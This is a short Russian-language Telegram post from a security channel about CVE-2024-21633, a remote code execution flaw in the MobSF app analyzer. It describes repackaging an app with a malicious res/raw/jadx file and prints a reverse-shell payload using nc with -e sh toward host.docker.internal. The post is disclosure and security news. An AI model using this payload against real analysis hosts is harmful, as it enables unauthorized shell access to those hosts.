SecuriXy.kz
9.3K subscribers
483 photos
22 videos
18 files
393 links
Все самое интересное из мира информ. безопасности и IT 👍🏻
Обсуждаем, делимся, умнеем
https://securixy.kz

Обратная связь - @feedback_securixy_bot

Хахатушки - @memekatz
Hack the Box RUS - @HTB_RUS
Download Telegram
#CVE-2024-21633 - #MobSF Remote code execution (#RCE)

MobSF - статический анализатор приложений: Android, Apple iOS и Windows Phone и динамический анализ: только приложения Android.

Пересобрав приложение с ночинкой в res/raw/jadx к примерутакого содержания:


#!/bin/bash
nc host.docker.internal 9001 -e sh

Можно получить реверс шелл с хоста на котором стоит анализатор, из-за фичи самого MobSF который позволяет записать что угодно по относительному пути ${decode target path}/res/

https://www.qu35t.pw/posts/2024-21633-mobsf-rce/

https://github.com/0x33c0unt/CVE-2024-21633